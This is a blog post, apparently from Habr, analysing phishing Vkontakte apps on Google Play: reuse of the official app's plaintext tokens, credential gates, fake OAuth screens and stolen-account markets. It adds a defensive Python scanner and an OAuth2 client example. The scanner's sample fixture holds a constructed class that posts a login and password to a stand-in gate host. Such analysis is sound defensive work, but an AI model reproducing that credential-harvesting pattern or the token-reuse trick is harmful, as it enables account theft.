
Phishing applications for Vkontakte on Google Play

A couple of months ago, Kaspersky Lab published an article about phishing of VK accounts on Google Play, but did not explain how it was implemented or why such applications linger in the store. Their article said that about 1 million users could have become victims of the phishing.

I reversed roughly the same applications in the spring. At the time I was arguing with a friend that there are malicious applications in the store. Outright malicious applications could not be found; there were only fakes for Vkontakte. But maybe I just did not look hard enough. By now they can no longer be found in the store; most likely they were removed after Kaspersky Lab's discovery.

But at the time of my search there were quite a lot of these applications. The main reason for their longevity was that they use the tokens of the official Vkontakte application, where those tokens are stored in the clear. Vkontakte cannot revoke or change its tokens, because not all users want to or can update the application: some simply do not want to, some have no space on the phone. And if the token were changed, the old versions of the application would stop working.
I managed to find the tokens in a couple of minutes, which in itself shows that they sit in the code in plain sight.

So, when an Android application is decompiled, the code is restored almost down to variable names. Here we look for all Activities and classes with names along the lines of VkLogin or AuthorizationVk. They will contain the variables for the login and password fields, as well as the URLs to which the requests are sent. At this point it becomes immediately clear whether the application is malicious.
In the process of reversing, I came across some interesting solutions, for example a very strange try-catch construct, in which authorization is first attempted with the tokens of the author's own application, and in the catch block with the tokens of the official application. The motives for such a strange decision are still unclear to me. Most applications simply use the official application's credentials right away.
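The search just described (find the login-looking classes, pull out the URLs they talk to, check whether a password field is being shipped to a host that is not Vkontakte) can be scripted over a tree of decompiled sources. The script below is an added illustration, not the author's tooling; the trusted host list is an assumption about where a genuine VK login flow should post, and the three sample source files are constructed, with `example.invalid` standing in for the gate URL of a harvesting app.

```python
"""Static triage of decompiled Android sources for credential-harvesting
login screens.  Added illustration of the search described in the post;
this is not the post author's tooling, and the sample sources below are
constructed rather than taken from any real application."""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Assumption: hosts that a genuine Vkontakte login or OAuth flow talks to.
TRUSTED_HOSTS = {"vk.com", "oauth.vk.com", "api.vk.com"}

CLASS_RE = re.compile(r"\bclass\s+(\w+)")
VK_NAME_RE = re.compile(r"vk", re.IGNORECASE)           # VkLogin, AuthorizationVk, ...
AUTH_NAME_RE = re.compile(r"login|auth|sign", re.IGNORECASE)
URL_RE = re.compile(r'"(https?://[^"\s]+)"')             # string-literal URLs
PASSWORD_RE = re.compile(r"password|passwd|\bpass\b", re.IGNORECASE)


def is_trusted_host(host: str) -> bool:
    """vk.com itself or any of its subdomains; everything else is foreign."""
    host = host.lower()
    return host in TRUSTED_HOSTS or host.endswith(".vk.com")


@dataclass
class Finding:
    class_name: str
    urls: list = field(default_factory=list)
    handles_password: bool = False

    @property
    def untrusted_hosts(self) -> list:
        hosts = {urlparse(u).hostname or "" for u in self.urls}
        return sorted(h for h in hosts if h and not is_trusted_host(h))

    @property
    def suspicious(self) -> bool:
        # A VK login screen that reads a password and sends it somewhere
        # other than VK is exactly the pattern the post describes.
        return self.handles_password and bool(self.untrusted_hosts)


def scan_source(text: str):
    """Return a Finding for a VK-login-like class, or None if not relevant."""
    m = CLASS_RE.search(text)
    if not m:
        return None
    name = m.group(1)
    if not (VK_NAME_RE.search(name) and AUTH_NAME_RE.search(name)):
        return None
    return Finding(
        class_name=name,
        urls=URL_RE.findall(text),
        handles_password=bool(PASSWORD_RE.search(text)),
    )


def triage(sources: dict) -> list:
    """sources maps a decompiled file path to its text; returns all findings."""
    findings = []
    for path in sorted(sources):
        f = scan_source(sources[path])
        if f is not None:
            findings.append(f)
    return findings


def flagged(sources: dict) -> list:
    """Names of the classes that look like credential harvesters."""
    return [f.class_name for f in triage(sources) if f.suspicious]


# Constructed sample: one harvesting screen, one legitimate OAuth screen,
# one unrelated activity.  Not from any real application.
SAMPLE_SOURCES = {
    "com/example/app/VkLoginActivity.java": '''
public class VkLoginActivity extends Activity {
    private EditText login;
    private EditText password;
    private static final String GATE = "http://example.invalid/gate.php";
    void send() { post(GATE, login.getText(), password.getText()); }
}
''',
    "com/example/app/VkAuthActivity.java": '''
public class VkAuthActivity extends Activity {
    private static final String AUTH_URL = "https://oauth.vk.com/authorize";
    void start() { webView.loadUrl(AUTH_URL + "?response_type=token"); }
}
''',
    "com/example/app/MainActivity.java": '''
public class MainActivity extends Activity {
    private static final String API = "https://api.vk.com/method/wall.get";
}
''',
}

if __name__ == "__main__":
    for f in triage(SAMPLE_SOURCES):
        print(f.class_name, f.urls, f.handles_password,
              f.untrusted_hosts, "SUSPICIOUS" if f.suspicious else "ok")
```

Running it over a real decompiled tree means reading each `.java` (or smali) file into the `sources` dict; the legitimate `VkAuthActivity` is reported but not flagged, because it posts nowhere outside vk.com and never touches a password field.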
One of the developers decided to reassure users and made an almost exact copy of the authorization screen via OAuth2.

(screenshot: the fake OAuth2-style login screen)

And this is how it should actually look:

(screenshot: the genuine Vkontakte OAuth2 authorization)
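The difference between the copy and the real thing is not the pixels but where the password goes. In the genuine OAuth2 flow the app only builds an authorization URL, hands the user to Vkontakte's own page, and reads an access token back from the redirect; it never sees the password. The code below is an added illustration of that client side, not code from the post or from Vkontakte: the endpoint, redirect URI and parameter names are assumptions about VK's implicit-grant flow, the client id is a placeholder, and the redirect URLs in the test data are constructed.

```python
"""Client side of the genuine OAuth2 (implicit grant) flow the post
contrasts with the fake login form.  Added illustration; the endpoint,
redirect URI and parameter names are assumptions about VK's flow."""
import secrets
from urllib.parse import urlencode, urlparse, parse_qs

AUTHORIZE_ENDPOINT = "https://oauth.vk.com/authorize"   # assumption
REDIRECT_URI = "https://oauth.vk.com/blank.html"        # assumption


def build_authorize_url(client_id: str, scope: str, state=None):
    """Return (url, state).  The app opens this URL in the system browser or
    a WebView; the user types the password on vk.com, never into the app."""
    state = state or secrets.token_urlsafe(16)
    params = {
        "client_id": client_id,
        "redirect_uri": REDIRECT_URI,
        "display": "mobile",
        "scope": scope,
        "response_type": "token",   # implicit grant: token returns in the fragment
        "state": state,             # ties the redirect back to this request
    }
    return f"{AUTHORIZE_ENDPOINT}?{urlencode(params)}", state


def parse_redirect(url: str, expected_state: str) -> dict:
    """Extract the token from the final redirect, refusing anything that did
    not land on the registered redirect URI or that carries the wrong state."""
    expected = urlparse(REDIRECT_URI)
    got = urlparse(url)
    if (got.scheme, got.hostname, got.path) != (expected.scheme, expected.hostname, expected.path):
        raise ValueError(f"unexpected redirect location: {url}")
    frag = {k: v[0] for k, v in parse_qs(got.fragment).items()}
    if frag.get("state") != expected_state:
        raise ValueError("state mismatch; redirect does not belong to this request")
    if "error" in frag:
        raise ValueError(f"authorization failed: {frag.get('error_description', frag['error'])}")
    return {
        "access_token": frag["access_token"],
        "expires_in": int(frag.get("expires_in", "0")),
        "user_id": frag.get("user_id"),
    }


if __name__ == "__main__":
    # PLACEHOLDER client id; the redirect URL is constructed, not captured.
    url, state = build_authorize_url("PLACEHOLDER_CLIENT_ID", "friends")
    print("open in browser:", url)
    demo = (f"{REDIRECT_URI}#access_token=CONSTRUCTED_TOKEN"
            f"&expires_in=86400&user_id=1&state={state}")
    print(parse_redirect(demo, state))
```

The two checks in `parse_redirect` are what a reviewer should look for in a real app: the token is accepted only from the exact registered redirect location, and only when the `state` matches the one this app generated. An app that instead presents its own username and password fields has no business in this flow at all.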
None of the applications were obfuscated, and the link to the gate (the PHP script that processes the data sent to it, for example checks that it is valid and writes it to the database) was also in the clear. The same applications kept popping up from the same developer, differing only in their icons. Immediately after publication the applications are pushed into the top with the help of purchased accounts, which write the reviews in which the messages about account theft get lost. The applications are not just a form with login fields. They are real, well-functioning applications that perform all the declared functions, even without advertising. Some of them continue to be supported by the developer after publication. Everything for the user's convenience, but with one small malicious feature. The collected accounts then go to the market. Such markets have become automated: a Google search for "buy VK accounts" returns a whole list.

The price of one account depends on its "coolness" (the number of friends, subscribers, photos, etc.) and ranges on average from 2 rubles to 2000 rubles. Such accounts are used for spam via personal messages, promotion of groups and applications, publishing posts in public pages, etc.

So, before installing an application, you should read the reviews carefully and be wary of applications that ask for your username and password. And for developers: if requesting a login and password is the only option, that decision should be explained to the user.

Source: https://habr.com/ru/post/272783/
